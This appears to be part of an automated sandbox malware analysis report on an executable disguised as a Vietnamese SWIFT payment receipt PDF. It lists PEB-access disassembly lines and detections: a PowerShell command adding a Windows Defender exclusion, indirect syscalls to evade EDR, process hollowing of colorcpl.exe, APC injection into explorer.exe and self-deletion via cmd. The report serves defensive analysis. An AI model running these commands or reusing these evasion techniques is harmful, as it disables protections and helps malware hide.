Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EA9D0 mov eax, dword ptr fs:[00000030h]	4_2_011EA9D0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EA9D0 mov eax, dword ptr fs:[00000030h]	4_2_011EA9D0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EA9D0 mov eax, dword ptr fs:[00000030h]	4_2_011EA9D0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EA9D0 mov eax, dword ptr fs:[00000030h]	4_2_011EA9D0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EA9D0 mov eax, dword ptr fs:[00000030h]	4_2_011EA9D0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012129F9 mov eax, dword ptr fs:[00000030h]	4_2_012129F9
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012129F9 mov eax, dword ptr fs:[00000030h]	4_2_012129F9
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012769C0 mov eax, dword ptr fs:[00000030h]	4_2_012769C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012149D0 mov eax, dword ptr fs:[00000030h]	4_2_012149D0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012AA9D3 mov eax, dword ptr fs:[00000030h]	4_2_012AA9D3
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121A830 mov eax, dword ptr fs:[00000030h]	4_2_0121A830
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128483A mov eax, dword ptr fs:[00000030h]	4_2_0128483A
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128483A mov eax, dword ptr fs:[00000030h]	4_2_0128483A
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01202835 mov eax, dword ptr fs:[00000030h]	4_2_01202835
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01202835 mov eax, dword ptr fs:[00000030h]	4_2_01202835
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01202835 mov eax, dword ptr fs:[00000030h]	4_2_01202835
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01202835 mov ecx, dword ptr fs:[00000030h]	4_2_01202835
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01202835 mov eax, dword ptr fs:[00000030h]	4_2_01202835
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01202835 mov eax, dword ptr fs:[00000030h]	4_2_01202835
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126C810 mov eax, dword ptr fs:[00000030h]	4_2_0126C810
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E4859 mov eax, dword ptr fs:[00000030h]	4_2_011E4859
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E4859 mov eax, dword ptr fs:[00000030h]	4_2_011E4859
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126E872 mov eax, dword ptr fs:[00000030h]	4_2_0126E872
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126E872 mov eax, dword ptr fs:[00000030h]	4_2_0126E872
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01276870 mov eax, dword ptr fs:[00000030h]	4_2_01276870
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01276870 mov eax, dword ptr fs:[00000030h]	4_2_01276870
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F2840 mov ecx, dword ptr fs:[00000030h]	4_2_011F2840
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01210854 mov eax, dword ptr fs:[00000030h]	4_2_01210854
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E0887 mov eax, dword ptr fs:[00000030h]	4_2_011E0887
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126C89D mov eax, dword ptr fs:[00000030h]	4_2_0126C89D
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012AA8E4 mov eax, dword ptr fs:[00000030h]	4_2_012AA8E4
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121C8F9 mov eax, dword ptr fs:[00000030h]	4_2_0121C8F9
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121C8F9 mov eax, dword ptr fs:[00000030h]	4_2_0121C8F9
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120E8C0 mov eax, dword ptr fs:[00000030h]	4_2_0120E8C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B08C0 mov eax, dword ptr fs:[00000030h]	4_2_012B08C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120EB20 mov eax, dword ptr fs:[00000030h]	4_2_0120EB20
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120EB20 mov eax, dword ptr fs:[00000030h]	4_2_0120EB20
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A8B28 mov eax, dword ptr fs:[00000030h]	4_2_012A8B28
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A8B28 mov eax, dword ptr fs:[00000030h]	4_2_012A8B28
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B4B00 mov eax, dword ptr fs:[00000030h]	4_2_012B4B00
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125EB1D mov eax, dword ptr fs:[00000030h]	4_2_0125EB1D
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125EB1D mov eax, dword ptr fs:[00000030h]	4_2_0125EB1D
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125EB1D mov eax, dword ptr fs:[00000030h]	4_2_0125EB1D
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125EB1D mov eax, dword ptr fs:[00000030h]	4_2_0125EB1D
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125EB1D mov eax, dword ptr fs:[00000030h]	4_2_0125EB1D
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125EB1D mov eax, dword ptr fs:[00000030h]	4_2_0125EB1D
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125EB1D mov eax, dword ptr fs:[00000030h]	4_2_0125EB1D
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125EB1D mov eax, dword ptr fs:[00000030h]	4_2_0125EB1D
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125EB1D mov eax, dword ptr fs:[00000030h]	4_2_0125EB1D
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011D8B50 mov eax, dword ptr fs:[00000030h]	4_2_011D8B50
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01294B4B mov eax, dword ptr fs:[00000030h]	4_2_01294B4B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01294B4B mov eax, dword ptr fs:[00000030h]	4_2_01294B4B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DCB7E mov eax, dword ptr fs:[00000030h]	4_2_011DCB7E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01276B40 mov eax, dword ptr fs:[00000030h]	4_2_01276B40
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01276B40 mov eax, dword ptr fs:[00000030h]	4_2_01276B40
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012AAB40 mov eax, dword ptr fs:[00000030h]	4_2_012AAB40
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01288B42 mov eax, dword ptr fs:[00000030h]	4_2_01288B42
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128EB50 mov eax, dword ptr fs:[00000030h]	4_2_0128EB50
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B2B57 mov eax, dword ptr fs:[00000030h]	4_2_012B2B57
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B2B57 mov eax, dword ptr fs:[00000030h]	4_2_012B2B57
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B2B57 mov eax, dword ptr fs:[00000030h]	4_2_012B2B57
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B2B57 mov eax, dword ptr fs:[00000030h]	4_2_012B2B57
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01294BB0 mov eax, dword ptr fs:[00000030h]	4_2_01294BB0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01294BB0 mov eax, dword ptr fs:[00000030h]	4_2_01294BB0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0BBE mov eax, dword ptr fs:[00000030h]	4_2_011F0BBE
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0BBE mov eax, dword ptr fs:[00000030h]	4_2_011F0BBE
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E0BCD mov eax, dword ptr fs:[00000030h]	4_2_011E0BCD
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E0BCD mov eax, dword ptr fs:[00000030h]	4_2_011E0BCD
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E0BCD mov eax, dword ptr fs:[00000030h]	4_2_011E0BCD
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126CBF0 mov eax, dword ptr fs:[00000030h]	4_2_0126CBF0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120EBFC mov eax, dword ptr fs:[00000030h]	4_2_0120EBFC
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01200BCB mov eax, dword ptr fs:[00000030h]	4_2_01200BCB
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01200BCB mov eax, dword ptr fs:[00000030h]	4_2_01200BCB
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01200BCB mov eax, dword ptr fs:[00000030h]	4_2_01200BCB
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E8BF0 mov eax, dword ptr fs:[00000030h]	4_2_011E8BF0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E8BF0 mov eax, dword ptr fs:[00000030h]	4_2_011E8BF0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E8BF0 mov eax, dword ptr fs:[00000030h]	4_2_011E8BF0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128EBD0 mov eax, dword ptr fs:[00000030h]	4_2_0128EBD0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121CA24 mov eax, dword ptr fs:[00000030h]	4_2_0121CA24
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120EA2E mov eax, dword ptr fs:[00000030h]	4_2_0120EA2E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01204A35 mov eax, dword ptr fs:[00000030h]	4_2_01204A35
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01204A35 mov eax, dword ptr fs:[00000030h]	4_2_01204A35
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121CA38 mov eax, dword ptr fs:[00000030h]	4_2_0121CA38
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126CA11 mov eax, dword ptr fs:[00000030h]	4_2_0126CA11
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0A5B mov eax, dword ptr fs:[00000030h]	4_2_011F0A5B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0A5B mov eax, dword ptr fs:[00000030h]	4_2_011F0A5B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128EA60 mov eax, dword ptr fs:[00000030h]	4_2_0128EA60
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121CA6F mov eax, dword ptr fs:[00000030h]	4_2_0121CA6F
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121CA6F mov eax, dword ptr fs:[00000030h]	4_2_0121CA6F
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121CA6F mov eax, dword ptr fs:[00000030h]	4_2_0121CA6F
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E6A50 mov eax, dword ptr fs:[00000030h]	4_2_011E6A50
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E6A50 mov eax, dword ptr fs:[00000030h]	4_2_011E6A50
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E6A50 mov eax, dword ptr fs:[00000030h]	4_2_011E6A50
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E6A50 mov eax, dword ptr fs:[00000030h]	4_2_011E6A50
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E6A50 mov eax, dword ptr fs:[00000030h]	4_2_011E6A50
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E6A50 mov eax, dword ptr fs:[00000030h]	4_2_011E6A50
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E6A50 mov eax, dword ptr fs:[00000030h]	4_2_011E6A50
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125CA72 mov eax, dword ptr fs:[00000030h]	4_2_0125CA72
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125CA72 mov eax, dword ptr fs:[00000030h]	4_2_0125CA72
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01236AA4 mov eax, dword ptr fs:[00000030h]	4_2_01236AA4
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EEA80 mov eax, dword ptr fs:[00000030h]	4_2_011EEA80
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EEA80 mov eax, dword ptr fs:[00000030h]	4_2_011EEA80
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EEA80 mov eax, dword ptr fs:[00000030h]	4_2_011EEA80
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EEA80 mov eax, dword ptr fs:[00000030h]	4_2_011EEA80
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EEA80 mov eax, dword ptr fs:[00000030h]	4_2_011EEA80
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EEA80 mov eax, dword ptr fs:[00000030h]	4_2_011EEA80
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EEA80 mov eax, dword ptr fs:[00000030h]	4_2_011EEA80
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EEA80 mov eax, dword ptr fs:[00000030h]	4_2_011EEA80
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EEA80 mov eax, dword ptr fs:[00000030h]	4_2_011EEA80
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B4A80 mov eax, dword ptr fs:[00000030h]	4_2_012B4A80
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01218A90 mov edx, dword ptr fs:[00000030h]	4_2_01218A90
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E8AA0 mov eax, dword ptr fs:[00000030h]	4_2_011E8AA0

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 7_2_008F1AC3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

7_2_008F1AC3

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe"
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe"			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	NtClose: Indirect: 0x157A56C
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	NtQueueApcThread: Indirect: 0x157A4F2			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Memory written: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Thread register set: target process: 4004			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Thread register set: target process: 4004			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 8F0000

Jump to behavior

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process created: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe"	Jump to behavior

Source: explorer.exe, 00000006.00000000.2157639279.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.3358112467.00000000013A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: explorer.exe, 00000006.00000000.2157639279.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2159724108.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3358112467.00000000013A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.2157639279.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.3358112467.00000000013A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.3347634724.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2157138817.0000000000D69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +Progman
Source: explorer.exe, 00000006.00000000.2157639279.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.3358112467.00000000013A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000000.2174937509.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3366414703.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd31A

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Queries volume information: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
